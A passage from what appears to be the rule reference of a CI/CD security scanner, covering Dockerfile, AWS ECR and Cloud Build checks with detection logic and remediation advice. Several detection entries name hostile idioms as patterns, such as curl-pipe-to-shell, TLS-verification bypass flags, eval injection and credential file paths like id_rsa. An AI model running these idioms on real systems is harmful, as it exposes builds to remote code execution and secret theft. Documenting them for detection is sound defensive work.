Recommendation. Never hard-code credentials in a Dockerfile. ENV values are baked into the image layer history; even if the value is later overwritten, docker history --no-trunc reads the original. Use RUN --mount=type=secret for build-time secrets or runtime env injection (docker run -e SECRET=…) for runtime ones. Rotate any secret already exposed.
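A minimal sketch of the build-time pattern, assuming an npm token exposed under the hypothetical secret id npm_token:

```dockerfile
# syntax=docker/dockerfile:1
FROM node:20-slim
WORKDIR /app
COPY package*.json ./
# The secret is mounted read-only at /run/secrets/npm_token for this
# step only; nothing lands in a layer or in `docker history`.
RUN --mount=type=secret,id=npm_token \
    NPM_TOKEN="$(cat /run/secrets/npm_token)" npm ci
```

Build with BuildKit enabled: `docker build --secret id=npm_token,src=$HOME/.npm_token .`.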
Source: DF-006 in the Dockerfile provider.
DF-008: RUN invokes docker --privileged or escalates capabilities HIGH
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. Mirrors GHA-017 / GL-017 / BB-013 / ADO-017 / CC-017 / JF-017 (docker run --privileged in CI scripts) but at Dockerfile build time. The risk is subtler: a privileged RUN step doesn't directly elevate the resulting image, but it gives the build host's docker daemon a chance to escape, and any tampered base image can exploit the elevated build.
Recommendation. A Dockerfile build step almost never legitimately needs --privileged or --cap-add SYS_ADMIN / ALL. If the build genuinely requires elevated capabilities (e.g. compiling a kernel module), do it in a sealed builder image and COPY the artifact out, don't carry the privileged execution into the runtime image.
Source: DF-008 in the Dockerfile provider.
DF-010: apt-get dist-upgrade / upgrade pulls unknown package versions LOW
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified.
How this is detected. Running apt-get upgrade (or dist-upgrade) inside a Dockerfile is the classic pet-vs-cattle anti-pattern. Two back-to-back builds with the same Dockerfile can produce different images because the upstream archive moved between the two RUN invocations. dist-upgrade additionally relaxes dependency resolution: it can install / remove arbitrary packages to satisfy upgrades, so the resulting image's package set isn't even bounded by what the Dockerfile declares.
Recommendation. Drop the upgrade step. Build on a recent base image instead: rebuild your image when the base image gets a security patch, and pin the base by digest per DF-001 so the rebuild is deterministic. apt-get install pkg=<version> for specific packages stays reproducible; upgrade / dist-upgrade does not.
Source: DF-010 in the Dockerfile provider.
DF-011: Package manager install without cache cleanup in same layer LOW
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified.
How this is detected. Each Dockerfile RUN produces a layer. Installing packages in one layer and cleaning the cache in a later layer leaves the cache files in the lower layer forever: the final image size is unchanged and the residual files broaden the attack surface (e.g. apt's signed-by keys, package metadata). The fix is layout, not behavior: do install + cleanup in the same RUN.
Recommendation. Combine the install and cleanup into the same RUN so the cache lands in a single layer that gets discarded together. Idiomatic pattern: RUN apt-get update && apt-get install -y <pkgs> && rm -rf /var/lib/apt/lists/*. Equivalent forms: apk add --no-cache <pkgs>, dnf install -y … && dnf clean all, yum install -y … && yum clean all, zypper -n in … && zypper clean -a.
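The apt-get form from the recommendation, spelled out as a single layer (the base image and package names are illustrative):

```dockerfile
FROM debian:12-slim
# Install and clean in one RUN: the apt cache is created and removed
# inside the same layer, so it never ships in the image.
RUN apt-get update \
 && apt-get install -y --no-install-recommends ca-certificates curl \
 && rm -rf /var/lib/apt/lists/*
```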
Source: DF-011 in the Dockerfile provider.
DF-012: RUN invokes sudo HIGH
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. sudo inside a Dockerfile is almost always a copy-paste from a host README. Its presence usually means one of three things, all of them wrong: (a) the build is silently running as root and the operator misread it, (b) the image carries an unrestricted sudoers line that a runtime escape can abuse, or (c) the package install chain depends on TTY-aware sudo behavior that breaks under non-TTY docker build. None of these cases benefit from keeping the directive.
Recommendation. Drop sudo from the RUN. Either the build is already running as root (the default before any USER directive), in which case sudo is no-op noise, or the build switched to a non-root USER and needs root for a specific step, in which case temporarily revert with USER root for that RUN and switch back afterward.
Source: DF-012 in the Dockerfile provider.
DF-013: EXPOSE declares sensitive remote-access port CRITICAL 🔧 fix
Evidences: 2.1.3 Ensure the build environment is hardened, 2.1.6 Ensure build workers have minimal network connectivity.
How this is detected. EXPOSE is documentation, not a firewall. It doesn't actually open the port. But EXPOSE 22 is a strong signal the image runs sshd, and any remote-access daemon inside the container blows up the threat model: now you have an extra auth surface, an extra service to keep patched, and a way for a compromised app to phone home from the outside. The container runtime / orchestrator's exec path covers every operational use case sshd traditionally served.
Recommendation. Remove the EXPOSE line for the remote-access port. If the operator legitimately needs to reach the container, exec into it (docker exec / kubectl exec). That path uses the orchestrator's auth and audit, doesn't open a network port, and doesn't ship an extra daemon inside the image. Containers should not run sshd / telnetd / ftpd / rsh-d / vncd / RDP alongside the application.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: DF-013 in the Dockerfile provider.
DF-014: WORKDIR set to a system / kernel filesystem path CRITICAL
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. Subsequent directives in the Dockerfile (COPY src dest, RUN writes, ADD …) resolve relative paths against the active WORKDIR. A WORKDIR /sys followed by COPY conf.txt config.txt writes into the kernel's sysfs surface: at best a build-time error, at worst a container-escape primitive that lets a compromised step manipulate cgroups, devices, or kernel config.
Recommendation. Move WORKDIR to a dedicated app directory (/app, /srv/app, /opt/<service>). System paths like /sys, /proc, /dev, /etc, / and the root home are not application directories; pointing the working dir at one means subsequent COPY / RUN writes target kernel-exposed namespaces or admin-only configuration.
Source: DF-014 in the Dockerfile provider.
DF-015: RUN grants world-writable permissions (chmod 777 / a+w) MEDIUM
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. World-writable directories under / are an established container-escape vector: any compromised process running as non-root can drop a payload that root-owned daemons later execute. The rule fires on the literal 777, a+w, and a+rwx modes; the more conservative 775 and ugo+x are not flagged.
Recommendation. Replace chmod 777 <path> with the narrowest permissions the workload actually needs. chmod 755 is enough for executables under a read-only root filesystem; 640 or 600 for files the runtime user reads. a+w is almost always copy-pasted from a SO answer and almost never the correct fix.
Known false positives.
- Test fixtures or scratch builds that intentionally share a directory across multiple non-root users may legitimately use 777. Suppress with an ignore-file entry rather than weakening the rule.
Source: DF-015 in the Dockerfile provider.
DF-016: Image lacks OCI provenance labels LOW
Evidences: 4.4.1 Ensure artifacts have provenance/SBOM metadata.
How this is detected. The OCI image-spec annotation set is a small de facto standard maintained by the OCI working group. Only image.source and image.revision are checked because they're the two whose absence makes incident response materially harder; image.title / image.description are nice-to-have but the rule doesn't fire on those.
Recommendation. Add a LABEL line carrying at least org.opencontainers.image.source (the URL of the source repo) and org.opencontainers.image.revision (the commit SHA built into the image). Most registries surface those fields in the UI and on manifest inspect, which closes the source-to-image gap that GHA-006 / SLSA Build-L2 provenance attestation also addresses.
Known false positives.
- A multi-stage build's intermediate stages don't need provenance labels; only the final image ships. The rule fires per Dockerfile, not per stage; suppress for files where the final FROM is an intentional throwaway scratch stage.
Source: DF-016 in the Dockerfile provider.
DF-017: ENV PATH prepends a world-writable directory MEDIUM 🔧 fix
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. A writable PATH entry that comes before the system bins lets any process inside the container shadow ls, ps, apt-get, cat, etc. by dropping a binary of the same name into the writable dir. On a multi-tenant image, or any image where an exploit can reach the filesystem, this is a free privilege-escalation vector.
Recommendation. Don't put /tmp, /var/tmp, /dev/shm, or any other world-writable path in PATH ahead of the system binary directories. Drop those entries entirely, or place them at the tail (ENV PATH=/usr/bin:$PATH:/tmp) so legitimate binaries always shadow anything dropped into the writable dir at runtime.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: DF-017 in the Dockerfile provider.
DF-018: RUN chown rewrites ownership of a system path MEDIUM
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. Recognises chown and chgrp invocations whose first non-flag path argument resolves under a system directory. The non-recursive case is also flagged because a single chown user /etc is just as harmful; the recursive flag matters for the size of the blast radius, not for whether it's wrong. Application paths under /opt, /srv, /var/lib/<app>, and /app are not flagged.
Recommendation. Don't chown system directories at build time. If the runtime user needs to own a workload-specific subtree, COPY --chown=<user>:<group> it into the image at the subtree root, or place the workload under a dedicated directory (e.g. /app, /srv/app) and chown only that path. Granting the runtime user write access to /etc, /usr, /sbin, or /lib lets a process exploit later steps to stage a binary the system trusts.
Source: DF-018 in the Dockerfile provider.
DF-019: COPY/ADD source path looks like a credential file HIGH 🔧 fix
Evidences: 2.3.4 Ensure pipelines are scanned for secrets and sensitive data.
How this is detected. Fires on any COPY or ADD whose source basename is a well-known credential filename (id_rsa, .npmrc, .netrc, .env, terraform.tfvars, …) or whose path tail matches a canonical credential location (.aws/credentials, .docker/config.json, .kube/config). Files with private-key extensions (.pem, .key, .p12, .pfx, .jks) are also flagged. Globs are not expanded, the rule reads the literal source token.
Recommendation. Don't COPY credential files into an image. Anything baked into a layer is recoverable by anyone who can pull the image, even if a later step deletes the file. For build-time secrets (npm tokens, registry credentials, SSH deploy keys), use RUN --mount=type=secret,id=<name> so the value lives only for the duration of the step. For runtime secrets, mount them from the orchestrator (Kubernetes Secret, ECS task role, Vault sidecar) instead.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Empty placeholder files (.env shipped as a template, config.json carrying only public flags). Suppress with a brief .pipelinecheckignore rationale and prefer an explicit non-secret name (.env.example).
Source: DF-019 in the Dockerfile provider.
DF-020: ARG declares a credential-named build argument HIGH 🔧 fix
Evidences: 2.3.4 Ensure pipelines are scanned for secrets and sensitive data.
How this is detected. Complements DF-006 (which flags an ENV/ARG with a literal credential-shaped value). This rule fires on the name alone (ARG NPM_TOKEN, ARG GITHUB_PAT, ARG DB_PASSWORD), even when no default is set, because BuildKit records the resolved value in the image's history the moment --build-arg supplies one. Names are matched via the same _primitives/secret_shapes regex used by the other secret-name rules.
Recommendation. Don't pass secrets through ARG. Build arguments are recorded in docker history whether the value comes from a default or from --build-arg at build time, so a credential-named ARG leaks the secret to anyone who can pull the image. Use RUN --mount=type=secret,id=<name> and feed the value with BuildKit's --secret flag; the secret never lands in a layer or in the build history.
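A sketch of the build-side half of that flow; the secret id, source path, and image tag are placeholders:

```shell
# Dockerfile side consumes it via: RUN --mount=type=secret,id=github_pat ...
# Build side feeds the value without it ever entering an ARG,
# a layer, or the image history.
DOCKER_BUILDKIT=1 docker build \
  --secret id=github_pat,src="$HOME/.config/github_pat" \
  -t myorg/app:dev .
```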
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- An
ARGwhose name matches the regex but is a non-secret config knob (a counter-example likeARG TOKEN_LIMIT). Rare; rename or suppress the finding with a brief rationale.
Source: DF-020 in the Dockerfile provider.
ECR-001: Image scanning on push not enabled HIGH
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. scan-on-push runs a CVE check against the image's OS package layers at the moment it lands in ECR. Without it, an image with a known CVE deploys silently. The ECR basic scanner is free; ECR-007 covers the Inspector v2 enhanced scanner that adds language-ecosystem CVEs (npm, pip, gem).
Recommendation. Enable imageScanningConfiguration.scanOnPush on the repository. Consider also enabling Amazon Inspector continuous scanning for ongoing CVE detection against images already in the registry.
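One way to flip the flag on an existing repository with the AWS CLI; the repository name is a placeholder:

```shell
# Enable basic scan-on-push so every pushed image gets a CVE check
# against its OS package layers on arrival.
aws ecr put-image-scanning-configuration \
  --repository-name my-app \
  --image-scanning-configuration scanOnPush=true
```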
Source: ECR-001 in the AWS provider.
ECR-002: Image tags are mutable HIGH
Evidences: 4.1.1 Ensure all artifacts on all releases are verified (signed, integrity-checked), 4.4.1 Ensure artifacts have provenance/SBOM metadata.
How this is detected. Mutable tags mean :latest, :v1.0, and :stable can be re-pushed silently: the same tag points to different image content over time. Pinning by digest (sha256:...) in deployment manifests is the only durable reference; IMMUTABLE on the repo enforces the property registry-side so a forgotten digest reference doesn't drift.
Recommendation. Set imageTagMutability=IMMUTABLE on the repository. Reference images by digest (sha256:...) in deployment manifests for strongest immutability guarantees.
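The registry-side enforcement via the AWS CLI; the repository name is a placeholder:

```shell
# After this, re-pushing an existing tag fails instead of
# silently repointing it at new image content.
aws ecr put-image-tag-mutability \
  --repository-name my-app \
  --image-tag-mutability IMMUTABLE
```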
Source: ECR-002 in the AWS provider.
ECR-003: Repository policy allows public access CRITICAL
Evidences: 4.2.1 Ensure access to artifacts is limited, 4.3.3 Ensure package registries use authentication and authorisation.
How this is detected. A wildcard-principal repo policy means anyone on the internet can pull images. Sometimes intentional (a publicly-distributed base image), but it should be a deliberate exposure, typically via the ECR Public registry rather than a private repo with a public policy. The default for build-output images should never be public.
Recommendation. Remove wildcard principals from the repository policy. Grant access only to specific AWS account IDs or IAM principals that require it.
Source: ECR-003 in the AWS provider.
ECR-004: No lifecycle policy configured LOW
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. Without a lifecycle policy, untagged images and old tagged images accumulate indefinitely. Stale images keep CVE attack surface available: anyone who can pull from the repo can pull the old, unpatched version even after a newer build has shipped. Lifecycle expiry is the housekeeper that closes that window.
Recommendation. Add a lifecycle policy that expires untagged images after a short period (e.g. 7 days) and limits the number of tagged images retained, reducing exposure to images with known CVEs.
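A sketch of the untagged-expiry half via the AWS CLI; the repository name and retention window are placeholders:

```shell
# Expire untagged images 7 days after push; add a second rule with
# countType=imageCountMoreThan to cap retained tagged images.
aws ecr put-lifecycle-policy --repository-name my-app --lifecycle-policy-text '{
  "rules": [{
    "rulePriority": 1,
    "description": "expire untagged images after 7 days",
    "selection": {
      "tagStatus": "untagged",
      "countType": "sinceImagePushed",
      "countUnit": "days",
      "countNumber": 7
    },
    "action": { "type": "expire" }
  }]
}'
```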
Source: ECR-004 in the AWS provider.
ECR-005: Repository encrypted with AES256 rather than KMS CMK MEDIUM
Evidences: 4.1.1 Ensure all artifacts on all releases are verified (signed, integrity-checked).
How this is detected. Same shape as CP-002 / CWL-002 / CCM-002: AES256 (the AWS-managed default) gives confidentiality at rest but no key-policy or CloudTrail Decrypt-event story. Container images are arguably sensitive intellectual property; the same key-policy + audit shape as build outputs in S3 is warranted.
Recommendation. Set encryptionType=KMS with a customer-managed key ARN.
Source: ECR-005 in the AWS provider.
GCB-001: Cloud Build step image not pinned by digest HIGH 🔧 fix
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. Bare references (gcr.io/cloud-builders/docker) are treated as :latest by Cloud Build. Tag-only references (:20, :latest) count as unpinned. Only @sha256:… suffixes pass.
Recommendation. Pin every steps[].name image to an @sha256:<digest> suffix. gcr.io/cloud-builders/docker:latest is mutable; Google publishes new builder images frequently and the next build would pull whatever is current. Resolve the digest with gcloud artifacts docker images describe <ref> --format='value(image_summary.digest)' and pin it.
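A minimal cloudbuild.yaml sketch of a digest-pinned step; the digest shown is a placeholder to be resolved with the gcloud command above:

```yaml
steps:
  - name: gcr.io/cloud-builders/docker@sha256:<digest>
    args: [build, -t, 'gcr.io/$PROJECT_ID/app', .]
```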
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GCB-001 in the Cloud Build provider.
GCB-002: Cloud Build uses the default service account HIGH
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. The default Cloud Build service account historically held roles/cloudbuild.builds.builder plus project-level editor in many organisations. Even under the GCP April-2024 default-identity change, the default SA is still broader than what a single pipeline needs. Explicit serviceAccount: is required to pass.
Recommendation. Create a dedicated service account for the build, grant it only the roles the pipeline actually needs (roles/artifactregistry.writer, roles/storage.objectCreator for artifact upload, etc.), and set serviceAccount: projects/<PROJECT>/serviceAccounts/<NAME>@.... Leaving it unset falls back to the default Cloud Build SA, which accumulates roles over a project's lifetime and is routinely granted roles/editor.
Source: GCB-002 in the Cloud Build provider.
GCB-003: Secret Manager value referenced in step args HIGH
Evidences: 2.3.4 Ensure pipelines are scanned for secrets and sensitive data.
How this is detected. Detection patterns: literal projects/<n>/secrets/<name>/versions/... URIs, gcloud secrets versions access shell invocations, and $(gcloud secrets …) command substitutions in step args or entrypoint.
Recommendation. Map the secret under availableSecrets.secretManager[] with an env: alias, then reference it from each step via secretEnv: [ALIAS]. Avoid inline gcloud secrets versions access in args; the resolved plaintext lands in build logs.
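A minimal sketch of that shape; the project, secret name, version number, and script are placeholders:

```yaml
availableSecrets:
  secretManager:
    - versionName: projects/<PROJECT>/secrets/api-key/versions/7
      env: API_KEY
steps:
  - name: gcr.io/cloud-builders/gcloud
    entrypoint: bash
    args: [./deploy.sh]   # the script reads $API_KEY from its environment
    secretEnv: [API_KEY]
```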
Source: GCB-003 in the Cloud Build provider.
GCB-004: dynamicSubstitutions on with user substitutions in step args HIGH
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. The _-prefix is Cloud Build's naming convention for user substitutions; they are editable via build trigger UI, gcloud builds submit --substitutions, and the REST API. Built-in substitutions ($PROJECT_ID, $COMMIT_SHA, $BUILD_ID) are derived from the trigger event and are not treated as user-controlled by this rule.
Recommendation. Either disable options.dynamicSubstitutions (it defaults to false) or move user substitutions ($_FOO) out of step args: pass them through env: and reference them inside a shell script the builder runs. Dynamic substitution re-evaluates bash syntax after variable expansion, giving trigger-config editors a script-injection channel.
Source: GCB-004 in the Cloud Build provider.
GCB-005: Build timeout unset or excessive LOW 🔧 fix
Evidences: 2.3.4 Ensure pipelines are scanned for secrets and sensitive data.
How this is detected. Cloud Build's default 10-minute timeout applies silently when timeout: is absent. Accepted format is <N>s (seconds); <N>m/<N>h forms are a gcloud convenience and are treated as malformed by the API.
Recommendation. Declare an explicit timeout: at the top of cloudbuild.yaml bounded to the build's realistic worst case (e.g. 1800s for most container builds). Explicit bounds shorten the window a compromised build can spend on a shared worker and flag regressions when a legitimate step slows down.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GCB-005 in the Cloud Build provider.
GCB-006: Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH
Evidences: 2.3.7 Ensure pipeline steps produce audit logs.
How this is detected. Complements GCB-004 (dynamicSubstitutions + user substitution in args). GCB-006 fires on intrinsically risky shell idioms (eval, sh -c "$X", backtick exec) regardless of whether the substitution source is currently trusted.
Recommendation. Replace eval "$VAR" / sh -c "$VAR" / backtick exec with direct command invocation. Validate or allow-list any value that must feed a dynamic command at the boundary. In Cloud Build these idioms typically appear in args: [-c, ...] entries under a bash entrypoint.
Known false positives.
- eval "$(ssh-agent -s)" and similar eval "$(<literal-tool>)" bootstrap idioms are intentionally NOT flagged: the substituted command is literal, only its output is eval'd.
Source: GCB-006 in the Cloud Build provider.
GCB-007: availableSecrets references versions/latest MEDIUM 🔧 fix
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. versions/latest is documented as a rolling alias. A build run on Monday and a re-run on Tuesday can consume different secret bodies without any change to cloudbuild.yaml, breaking the reproducibility invariant that pinning protects.
Recommendation. Pin each availableSecrets.secretManager[].versionName to a specific version number (.../versions/7) rather than latest. Rotate by updating the number when a new version is promoted, not by silently publishing a new version that the next build pulls.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GCB-007 in the Cloud Build provider.
GCB-008: No vulnerability scanning step in Cloud Build pipeline MEDIUM
Evidences: 2.4.2 Ensure pipeline integrity, artifacts are signed by the pipeline.
How this is detected. The detector matches tool names anywhere in the document, step images, args, or entrypoint strings. Container Analysis API scanning configured at the project level counts as compensating control but is out of scope for this YAML-only check; if you rely on it, suppress this rule via --checks.
Recommendation. Add a step that runs a vulnerability scanner: trivy, grype, snyk test, npm audit, pip-audit, osv-scanner, or govulncheck. In Cloud Build this typically looks like a step with name: aquasec/trivy or an entrypoint: bash step that invokes trivy image / grype <ref> on the built image.
Source: GCB-008 in the Cloud Build provider.
GCB-009: Artifacts not signed (no cosign / sigstore step) MEDIUM
Evidences: 4.4.1 Ensure artifacts have provenance/SBOM metadata.
How this is detected. Silent-pass when the pipeline does not appear to produce artifacts (no docker push / gcloud run deploy / kubectl apply / etc. in any step). The detector matches cosign, sigstore, slsa-framework, and notation.
Recommendation. Add a signing step before images: is resolved. For example, a step with name: gcr.io/projectsigstore/cosign that runs cosign sign --yes <registry>/<repo>@<digest>. Pair with an attestation step (cosign attest --predicate sbom.json --type cyclonedx) so consumers can verify both the signature and the build provenance.
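A sketch of the signing step; the registry path and digest are placeholders (in practice the digest comes from the preceding push step's output):

```yaml
steps:
  - name: gcr.io/projectsigstore/cosign
    entrypoint: cosign
    args: [sign, --yes, 'us-docker.pkg.dev/$PROJECT_ID/repo/app@sha256:<digest>']
```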
Source: GCB-009 in the Cloud Build provider.
GCB-010: Remote script piped to shell interpreter HIGH
Evidences: 2.1.6 Ensure build workers have minimal network connectivity.
How this is detected. Detects curl | bash, wget | sh, bash -c "$(curl …)", inline python -c urllib.urlopen, curl > x.sh && bash x.sh, and PowerShell irm | iex idioms. Vendor-trusted hosts (rustup.rs, get.docker.com, sdk.cloud.google.com, …) are still flagged at HIGH but the hit carries a vendor_trusted marker so dashboards can stratify known-vendor installers from arbitrary attacker URLs.
Recommendation. Download the script to a file, verify its checksum, then execute it. Or vendor the script into the repository and invoke it from the checkout; removing the network fetch removes the attacker-controllable content entirely.
Source: GCB-010 in the Cloud Build provider.
GCB-011: TLS / certificate verification bypass HIGH 🔧 fix
Evidences: 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. Covers curl -k / wget --no-check-certificate, git config http.sslVerify false, NODE_TLS_REJECT_UNAUTHORIZED=0, npm config set strict-ssl false, PYTHONHTTPSVERIFY=0, GOINSECURE=, helm --insecure-skip-tls-verify, kubectl --insecure-skip-tls-verify, and ssh -o StrictHostKeyChecking=no.
Recommendation. Fix the underlying certificate issue, install the correct CA bundle into the step image, or point the tool at a mirror that presents a valid chain. Disabling verification trades a build error for a silent MITM window.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GCB-011 in the Cloud Build provider.
GCB-012: Credential-shaped literal in pipeline body CRITICAL
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified.
How this is detected. Complements GCB-003 (inline gcloud secrets versions access) and GCB-007 (/versions/latest alias). This rule runs the shared credential-shape catalog against every string in the YAML: AWS keys, GitHub PATs, Slack webhooks, JWTs, PEM private-key blocks, and any user-registered --secret-pattern regex. Known placeholders like EXAMPLE / CHANGEME are filtered upstream so fixtures and docs don't false-match.
Recommendation. Rotate the exposed credential immediately. Move the value to availableSecrets.secretManager and reference it via secretEnv: so the plaintext never lands in the YAML or the build logs. For cloud access prefer workload-identity federation over long-lived keys.
Source: GCB-012 in the Cloud Build provider.
GCB-013: Package install bypasses registry integrity (git / path / tarball) MEDIUM
Evidences: 2.1.6 Ensure build workers have minimal network connectivity.
How this is detected. Complements GCB-012 (literal secrets) and GCB-010 (curl-pipe). Where those catch attacker content at fetch time, this rule catches installs that silently bypass the lockfile/registry integrity model: the build is technically reproducible but the source of truth is whatever the git ref / filesystem / tarball URL served most recently.
Recommendation. Pin git dependencies to a commit SHA (pip install git+https://…/repo@<sha>, cargo install --git … --rev <sha>). Publish private packages to Artifact Registry (or another internal registry) instead of installing from a filesystem path or tarball URL.
Source: GCB-013 in the Cloud Build provider.
GCB-014: Build logging disabled (options.logging: NONE) HIGH 🔧 fix
Evidences: 2.3.8 Ensure pipeline configuration files are reviewed before execution.
How this is detected. options.logging defaults to CLOUD_LOGGING_ONLY when omitted, which passes. Only the explicit NONE value (case-insensitive) trips this rule. GCS_ONLY and LEGACY pass: they persist logs, just to a different destination.
Recommendation. Remove the logging: NONE override, or replace it with CLOUD_LOGGING_ONLY / GCS_ONLY, so every step's stdout, stderr, and exit code is persisted. Loss of logs is a detection-and-response black hole; the storage cost is measured in cents.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GCB-014 in the Cloud Build provider.
GCB-015: SBOM not produced (no CycloneDX / syft / Trivy-SBOM step) MEDIUM
Evidences: 2.4.2 Ensure pipeline integrity, artifacts are signed by the pipeline.
How this is detected. Complements GCB-009 (signing) and GCB-008 (vuln scanning). Without an SBOM, downstream consumers cannot audit the exact dependency set shipped in a Cloud Build image, delaying vulnerability response when a transitive dep is disclosed. Pairs naturally with cosign attest --type cyclonedx in a follow-up step.
Recommendation. Add an SBOM generation step (e.g. syft <image> -o cyclonedx-json or trivy image --format cyclonedx) and publish the resulting document alongside the image (typically via a cosign attestation so the SBOM travels with the artifact).
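One way to wire this into cloudbuild.yaml (the image name and sbom.json filename are illustrative; the cosign step assumes signing credentials are already configured):

```yaml
steps:
  - name: anchore/syft
    args: ['gcr.io/$PROJECT_ID/myapp:$COMMIT_SHA', '-o', 'cyclonedx-json=sbom.json']
  - name: gcr.io/projectsigstore/cosign
    args: ['attest', '--type', 'cyclonedx', '--predicate', 'sbom.json',
           'gcr.io/$PROJECT_ID/myapp:$COMMIT_SHA']
```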
Source: GCB-015 in the Cloud Build provider.
GCB-016: Step dir field contains parent-directory escape (..) MEDIUM
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. Cloud Build doesn't sandbox the dir: value beyond a join against /workspace. dir: ../etc resolves to /etc inside the builder container, which is rarely the intent. The check fires on any literal .. segment; single-dot ./ and absolute paths are fine.
Recommendation. Replace .. traversals in dir: with absolute paths rooted under /workspace (e.g. dir: /workspace/sub) or split the work across multiple steps that each set dir: to an exact subdirectory. The Cloud Build worker starts each step with the workspace mounted at /workspace; a .. escape from there reaches the builder image's root filesystem and any credentials the image carries.
Source: GCB-016 in the Cloud Build provider.
GCB-017: Image-producing build does not request SLSA provenance MEDIUM
Evidences: 2.3.7 Ensure pipeline steps produce audit logs.
How this is detected. SLSA Build Level 2 requires that the build platform produce signed provenance. Cloud Build's requestedVerifyOption: VERIFIED is the documented way to opt in. The check is silent when the build does not produce an image (no top-level images: and no docker push / gcloud run deploy style steps); for those, signing and provenance aren't applicable.
Recommendation. Set options.requestedVerifyOption: VERIFIED on builds that publish container images. Cloud Build then emits a signed SLSA provenance attestation alongside the image, which downstream verifiers (Binary Authorization, cosign verify-attestation, gcloud artifacts docker images describe) can use to check that an image was built by the configured pipeline rather than smuggled in from elsewhere.
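A sketch of the opt-in (image name illustrative):

```yaml
options:
  requestedVerifyOption: VERIFIED
images:
  - 'gcr.io/$PROJECT_ID/myapp:$COMMIT_SHA'
```

Downstream, gcloud artifacts docker images describe <image> --show-provenance surfaces the resulting attestation.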
Source: GCB-017 in the Cloud Build provider.
GCB-018: Legacy KMS secrets block in use (prefer availableSecrets / Secret Manager) MEDIUM
Evidences: 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. Cloud Build supports two secret-injection mechanisms. The older secrets: block carries KMS-encrypted ciphertext directly in the YAML; the cipher is decrypted at build time if the build's service account has cloudkms.cryptoKeyDecrypter on the key. The newer availableSecrets block references Secret Manager versions by URL, which is the documented modern approach. The legacy form still works, but rotating a value means re-encrypting and committing a new ciphertext.
Recommendation. Migrate from the top-level secrets: block (KMS-encrypted values stored inline in the YAML) to availableSecrets + Secret Manager. Replace each secrets[].secretEnv mapping with a versionName reference under availableSecrets.secretManager. Secret Manager rotates without re-encrypting and re-committing the YAML, scopes access via IAM rather than the KMS key's IAM, and produces an explicit audit log entry on every read.
Known false positives.
- Builds that use both forms during a migration trip the rule on the legacy block. That's intentional: finishing the migration is the fix.
Source: GCB-018 in the Cloud Build provider.
GCB-019: Shell entrypoint inlines a user substitution into args HIGH
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. Distinct from GCB-004, which fires only when options.dynamicSubstitutions: true re-evaluates bash syntax after expansion. GCB-019 fires whenever a step uses a shell as its entrypoint AND a $_USER_VAR token lands inside args: Cloud Build expands the substitution before the step runs, and the shell then interprets any metacharacters the substitution carried, straight command injection through trigger configuration.
Recommendation. Pass user substitutions through env: (or secretEnv: for sensitive values) and reference them inside a checked-in shell script rather than splicing them directly into args. If the step truly needs to invoke shell logic inline, switch the entrypoint to the underlying tool (docker, gcloud, gsutil) and let the tool see the substitution as an argument, not as shell text.
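A sketch of the safe shape, assuming a checked-in deploy script and a $_DEPLOY_ENV trigger substitution:

```yaml
steps:
  - name: gcr.io/cloud-builders/gcloud
    entrypoint: bash
    env:
      - 'DEPLOY_ENV=$_DEPLOY_ENV'   # substitution expands into an env var, not shell text
    # $$ defers expansion to the shell; metacharacters stay inert inside the quotes
    args: ['-c', './scripts/deploy.sh "$$DEPLOY_ENV"']
```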
Source: GCB-019 in the Cloud Build provider.
GCB-020: serviceAccount points at the default Cloud Build service account HIGH
Evidences: 4.2.1 Ensure access to artifacts is limited.
